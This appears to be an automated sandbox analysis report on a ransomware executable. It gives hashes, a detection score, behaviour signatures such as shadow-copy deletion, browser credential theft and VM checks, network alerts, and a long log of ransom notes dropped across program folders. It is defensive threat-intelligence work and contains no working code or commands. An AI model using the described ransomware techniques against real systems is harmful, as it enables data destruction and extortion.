Edit tour

Windows Analysis Report
2b7cu0KwZl.exe

Overview

General Information

Sample name:	2b7cu0KwZl.exe renamed because original name is a hash value
Original sample name:	e21cbdbf6414ffc0ef4175295c7e188800a66b7b83302bd35b7e3fd6fabfccde.exe
Analysis ID:	1548500
MD5:	0d7e80ec85db5cb45642235cb2381a0c
SHA1:	f0a15a7ecaff7d0659bab2a416e5d668ff67724e
SHA256:	e21cbdbf6414ffc0ef4175295c7e188800a66b7b83302bd35b7e3fd6fabfccde
Tags:	193-143-1-139exeuser-JAMESWT_MHT
Infos:

Detection

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Deletes shadow drive data (may be related to ransomware)

Found Tor onion address

Infects executable files (exe, dll, sys, html)

Modifies existing user documents (likely ransomware behavior)

Query firmware table information (likely to detect VMs)

Tries to harvest and steal browser information (history, passwords, etc)

Writes a notice file (html or txt) to demand a ransom

Writes many files with high entropy

Abnormal high CPU Usage

Enables debug privileges

IP address seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

May use bcdedit to modify the Windows boot settings

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

2b7cu0KwZl.exe (PID: 4476 cmdline: "C:\Users\user\Desktop\2b7cu0KwZl.exe" MD5: 0D7E80EC85DB5CB45642235CB2381A0C)

cleanup

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T15:21:29.172717+0100	2022930	1	A Network Trojan was detected	20.109.210.53	443	192.168.2.4	49737	TCP
2024-11-04T15:22:08.641719+0100	2022930	1	A Network Trojan was detected	20.109.210.53	443	192.168.2.4	49772	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 2b7cu0KwZl.exe

ReversingLabs: Detection: 47%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.4% probability

Source: 2b7cu0KwZl.exe, 00000000.00000000.1791805543.00007FF6882F3000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: -----BEGIN RSA PUBLIC KEY-----

memstr_459c71e0-4

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\7-Zip\Lang\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\7-Zip\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\locales\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\swiftshader\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\locales\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\swiftshader\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Air\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Assets\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\CAN\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\DEU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\FRA\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\JPN\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\UK\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ar_AE\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\cs_CZ\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\da_DK\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\de_DE\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\el_GR\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_AE\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_GB\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_IL\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_US\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\es_ES\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fi_FI\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_FR\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_MA\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\he_IL\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\hu_HU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\it_IT\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ja_JP\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ko_KR\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nb_NO\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nl_NL\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pl_PL\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pt_BR\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ru_RU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sk_SK\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sl_SI\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sv_SE\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\tr_TR\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\uk_UA\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_CN\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_TW\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Locale\en_US\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\ie\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\regular\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\PMP\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\MPP\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\prc\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\ENU\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\__VERSION__\private\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\__VERSION__\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\appmeasurement\prod\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\appmeasurement\stage\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\fonts\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\fonts\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\images\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\js\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\hi_contrast\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\hi_contrast\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win-scrollbar\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win-scrollbar\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\win8-scrollbar\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\en-gb\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\fi-fi\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\fr-fr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\fr-ma\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\hr-hr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\hu-hu\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\it-it\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ja-jp\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ko-kr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\nb-no\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\nl-nl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\pl-pl\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\pt-br\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ro-ro\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\root\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\ru-ru\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\sk-sk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\sl-si\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\sv-se\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\tr-tr\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\uk-ua\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\zh-cn\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\zh-tw\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app\dev\nls\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\app-api\dev\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ca-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\cs-cz\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\da-dk\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\de-de\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\en-ae\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\en-gb\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\en-il\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\es-es\RECOVERY INFO.txt	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\eu-es\RECOVERY INFO.txt	Jump to behavior
